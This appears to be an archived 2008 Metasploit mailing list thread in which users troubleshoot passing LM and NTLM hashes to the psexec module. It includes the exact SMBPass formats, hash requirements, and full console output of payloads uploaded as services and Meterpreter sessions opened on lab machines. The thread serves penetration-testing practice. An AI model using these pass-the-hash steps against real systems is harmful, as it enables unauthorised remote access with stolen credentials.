Metasploit mailing list archives
Using LM and NTLM Hashes with Metasploit's psexec
From: mathewbrown at fastmail.fm (Mathew Brown)
Date: Sat, 12 Apr 2008 11:53:49 -0700
Thanks Kurt, I was able to get it to work using Metasploit v3.1 although v3.0 gives me the following error: msf exploit(psexec) > exploit [*] Started reverse handler [*] Connecting to the server... [*] Authenticating as user 'Administrator'... [-] Exploit failed: Login Failed: The server responded with error: STATUS_LOGON_FAILURE (Command=115 WordCount=0) Also, the meterpreter exploit is only giving me the core api and not the stdapi when using v3.1. Here's an example of the output: msf exploit(psexec) > exploit [*] Started reverse handler [*] Connecting to the server... [*] Authenticating as user 'Administrator'... [*] Uploading payload... [*] Created \hAKmOasU.exe... [*] Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0 at ncacn_np:192.168.192.132[\svcctl] ... [*] Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0 at ncacn_np:192.168.192.132[\svcctl] ... [*] Obtaining a service manager handle... [*] Creating a new service (KSpLNIZa - "MzGErdEaSogkoVTptHmQWyOovKyS")... [*] Closing service handle... [*] Opening service... [*] You *MUST* manually remove the service: (KSpLNIZa - "MzGErdEaSogkoVTptHmQWyOovKyS") [*] You *MUST* manually delete the service file: %SYSTEMROOT%\hAKmOasU.exe [*] Starting the service... [*] Transmitting intermediate stager for over-sized stage...(89 bytes) [*] Sending stage (2834 bytes) [*] Sleeping before handling stage... [*] Uploading DLL (81931 bytes)... [*] Upload completed. [*] Error: no response from dcerpc service [*] Meterpreter session 1 opened (192.168.192.1:4444 -> 192.168.192.132:1033) msf exploit(psexec) > sessions -i 1 [*] Starting interaction with 1... meterpreter > help Core Commands ============= Command Description ------- ----------- ? Help menu channel Displays information about active channels close Closes a channel exit Terminate the meterpreter session help Help menu interact Interacts with a channel irb Drop into irb scripting mode migrate Migrate the server to another process quit Terminate the meterpreter session read Reads data from a channel run Executes a meterpreter script use Load a one or more meterpreter extensions write Writes data to a channel meterpreter > I tried using stdapi but it didn't work: meterpreter > use stdapi Loading extension stdapi...[-] failure: Broken pipe ./lib/rex/io/stream.rb:40:in `syswrite' ./lib/rex/io/stream.rb:40:in `write' ./lib/rex/post/meterpreter/packet_dispatcher.rb:59:in `send_packet' ./lib/rex/post/meterpreter/packet_dispatcher.rb:92:in `send_packet_wait_response' ./lib/rex/post/meterpreter/client_core.rb:114:in `load_library' ./lib/rex/post/meterpreter/client_core.rb:156:in `use' ./lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb:249:in `cmd_use' ./lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb:237:in `each' ./lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb:237:in `cmd_use' ./lib/rex/ui/text/dispatcher_shell.rb:234:in `send' ./lib/rex/ui/text/dispatcher_shell.rb:234:in `run_command' ./lib/rex/post/meterpreter/ui/console.rb:94:in `run_command' ./lib/rex/ui/text/dispatcher_shell.rb:196:in `run_single' ./lib/rex/ui/text/dispatcher_shell.rb:191:in `each' ./lib/rex/ui/text/dispatcher_shell.rb:191:in `run_single' ./lib/rex/post/meterpreter/ui/console.rb:60:in `interact' ./lib/rex/ui/text/shell.rb:121:in `call' ./lib/rex/ui/text/shell.rb:121:in `run' ./lib/rex/post/meterpreter/ui/console.rb:58:in `interact' ./lib/msf/base/sessions/meterpreter.rb:170:in `_interact' ./lib/rex/ui/interactive.rb:48:in `interact' ./lib/msf/ui/console/command_dispatcher/core.rb:722:in `cmd_sessions' ./lib/rex/ui/text/dispatcher_shell.rb:234:in `send' ./lib/rex/ui/text/dispatcher_shell.rb:234:in `run_command' ./lib/rex/ui/text/dispatcher_shell.rb:196:in `run_single' ./lib/rex/ui/text/dispatcher_shell.rb:191:in `each' ./lib/rex/ui/text/dispatcher_shell.rb:191:in `run_single' ./lib/rex/ui/text/shell.rb:125:in `run' ./msfconsole:77 Any ideas? Thanks. On Sat, 12 Apr 2008 09:24:54 -0700, "Kurt Grutzmacher" <grutz at jingojango.net> said:
The format is LM:NTLM and the only way the library knows is by looking for two 32-byte characters separated with a colon. What was the source of the hashes? Any pass-the-hash technique must have the direct PW->Hash result, anything that has been encrypted further with a nonce won't work. Also, NTLMv2 is not yet supported so your target must negotiate to NTLMv1. I just tried it against a Win2K3 server green install without a problem: msf exploit(psexec) > set SMBPass 6A98EB0FB88A449CBE6FABFD825BCA61:A4141712F19E9DD5ADF16919BB38A95C SMBPass => 6A98EB0FB88A449CBE6FABFD825BCA61:A4141712F19E9DD5ADF16919BB38A95C msf exploit(psexec) > exploit [*] Started bind handler [*] Connecting to the server... [*] Authenticating as user 'Administrator'... [*] Uploading payload... [*] Created \tCmiQnDv.exe... [*] Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0 at ncacn_np:10.1.1.183[\svcctl] ... [*] Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0 at ncacn_np:10.1.1.183[\svcctl] ... [*] Obtaining a service manager handle... [*] Creating a new service (iQjTupTr - "MniZYWPVdyZvaRRSNZZIGe")... [*] Closing service handle... [*] Opening service... [*] You *MUST* manually remove the service: (iQjTupTr - "MniZYWPVdyZvaRRSNZZIGe") [*] You *MUST* manually delete the service file: %SYSTEMROOT%\tCmiQnDv.exe [*] Starting the service... [*] Transmitting intermediate stager for over-sized stage...(89 bytes) [*] Sending stage (2834 bytes) [*] Sleeping before handling stage... [*] Uploading DLL (81931 bytes)... [*] Upload completed. [*] Error: no response from dcerpc service [*] Meterpreter session 1 opened (10.1.1.55:38241 -> 10.1.1.183:5555) msf exploit(psexec) > Kurt On Fri, Apr 11, 2008 at 8:21 PM, Mathew Brown <mathewbrown at fastmail.fm> wrote:Hi HD, Thank you for your reply, but I can't seem to get it to work. Also, where would I get the NTLM response from? I currently have the LM and NTLM hashes, not responses. I tried setting it to the LM:NTLM hash but it failed. I then tried it with just the NTLM hash and it also failed. Finally, I tried it in the :NTLM: format and it failed. Here's an example of what it tells me (the hash isn't really important since it's a test machine): msf exploit(psexec) > set SMBPass ::570ce399da1412abaad3b435851404ee:b9d2d4957b330b503cc792eb6a55bb1::: SMBPass => ::570ce399da1412abaad3b435851404ee:b9d2d4957b330b503cc792eb6a55bb1::: msf exploit(psexec) > exploit [*] Started reverse handler [*] Connecting to the server... [*] Authenticating as user 'Administrator'... [-] Exploit failed: Login Failed: The server responded with error: STATUS_LOGON_FAILURE (Command=115 WordCount=0) msf exploit(psexec) > set SMBPass b9d2d4957b330b503cc792eb6a55bb1 SMBPass => b9d2d4957b330b503cc792eb6a55bb1 msf exploit(psexec) > exploit [*] Started reverse handler [*] Connecting to the server... [*] Authenticating as user 'Administrator'... [-] Exploit failed: Login Failed: The server responded with error: STATUS_LOGON_FAILURE (Command=115 WordCount=0) msf exploit(psexec) > set SMBPass :b9d2d4957b330b503cc792eb6a55bb1f: msf exploit(psexec) > exploit [*] Started reverse handler [*] Connecting to the server... [*] Authenticating as user 'Administrator'... [-] Exploit failed: Login Failed: The server responded with error: STATUS_LOGON_FAILURE (Command=115 WordCount=0) Also, how would psexec differentiate between you sending it an NTLM hash to use for authentication and you sending it a password? In the example above, what if my password was b9d2d4957b330b503cc792eb6a55bb1f? How would psexec know that this was an NTLM hash and not a password? Any ideas? Thanks for your help. PS. I'm currently running Metasploit v3.1. After the failed attempts above, I verified that psexec works fine when I provide it with the real password and not the LM or NTLM hashes.On Friday 11 April 2008, H D Moore wrote: I think you can just set SMBPass to the NTLM response and call it done (thanks grutz!). -HD On Friday 11 April 2008, Mathew Brown wrote:Hi, After running info windows/smb/psexec in metasploit, it tells me: "This module uses a valid administrator username and password (or password hash) to execute an arbitrary payload." I currently have the LM and NTLM hashes for a valid account on a remote machine but not the actual password. How would I pass this information to the SMBPass variable. Should I just put it as LM:HASH? Thanks. -- Mathew Brown mathewbrown at fastmail.fm-- Mathew Brown mathewbrown at fastmail.fm -- http://www.fastmail.fm - The professional email service _______________________________________________ http://spool.metasploit.com/mailman/listinfo/framework
-- Mathew Brown mathewbrown at fastmail.fm -- http://www.fastmail.fm - Does exactly what it says on the tin
Current thread:
- Using LM and NTLM Hashes with Metasploit's psexec Mathew Brown (Apr 11)
- Using LM and NTLM Hashes with Metasploit's psexec H D Moore (Apr 11)
- <Possible follow-ups>
- Using LM and NTLM Hashes with Metasploit's psexec Mathew Brown (Apr 11)
- Using LM and NTLM Hashes with Metasploit's psexec Kurt Grutzmacher (Apr 12)
- Using LM and NTLM Hashes with Metasploit's psexec Mathew Brown (Apr 12)
- Using LM and NTLM Hashes with Metasploit's psexec Kurt Grutzmacher (Apr 12)
- Using LM and NTLM Hashes with Metasploit's psexec Mathew Brown (Apr 13)
- Using LM and NTLM Hashes with Metasploit's psexec Kurt Grutzmacher (Apr 12)